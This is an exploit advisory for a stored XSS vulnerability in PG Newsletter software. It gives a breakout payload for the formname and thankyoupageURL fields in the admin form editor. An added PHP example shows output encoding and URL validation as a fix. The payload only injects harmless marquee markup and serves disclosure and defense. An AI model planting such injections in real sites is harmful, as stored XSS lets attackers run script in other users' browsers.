PG Newsletter persistent XSS vulnerability

# Exploit Title: PG Newsletter persistent XSS vulnerability
# Vendor:  demo.newsletter.pro
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# My Blog: http://www.shadowrootkit.wordpress.com
# Google Dork:  © 2010 PilotGroup.NET Powered by PG Newsletter Software – email marketing software
*************************************************************************************************
Persistent XSS Vulnerability
********************************
{DEMO} : demo.newsletter.pro/forms/index.php?sel=edit
EXPLOIT:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

Observe: Log in to the admin panel (demo). Inject this script in the create-form page, i.e. (DEMO), in the formname field or the thankyoupageURL field.
Now observe: demo.newsletter.pro/forms/index.php
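
The stored values from the formname and thankyoupageURL fields are shown again on the forms list page, so the fix belongs where that page builds its HTML. The following is an added example, not code from the original post or from PG Newsletter: a PHP sketch of output encoding plus URL validation, in which the function names and the record layout are assumptions.

```php
<?php
// Added example: hypothetical rendering code, not PG Newsletter source.
// Only the field names formname / thankyoupageURL come from the advisory.

// Encode a value for an HTML text node or a quoted attribute at output time.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only absolute http(s) URLs for the thank-you page.
function valid_thankyou_url(string $url): bool
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    // FILTER_VALIDATE_URL does not restrict the scheme, so check it explicitly.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

// Render one row of the forms list, the page where stored values are displayed.
function render_form_row(array $form): string
{
    $name = h($form['formname']);
    if (valid_thankyou_url($form['thankyoupageURL'])) {
        $url  = h($form['thankyoupageURL']);
        $link = "<a href=\"{$url}\">{$url}</a>";
    } else {
        // Never echo a rejected value back into the page.
        $link = '<em>invalid URL</em>';
    }
    return "<tr><td>{$name}</td><td>{$link}</td></tr>";
}

// Constructed sample records: one carrying markup in both fields, one benign.
$rows = [
    ['formname' => '"><marquee><h1>test</h1></marquee>',
     'thankyoupageURL' => '"><marquee><h1>test</h1></marquee>'],
    ['formname' => 'Spring signup',
     'thankyoupageURL' => 'https://example.com/thanks'],
];

foreach ($rows as $row) {
    echo render_form_row($row), PHP_EOL;
}
```

Validating thankyoupageURL when the form is saved is a useful second layer, but encoding at output is what keeps markup already stored in the database from executing.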

**************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14–
***************************************************************************************************
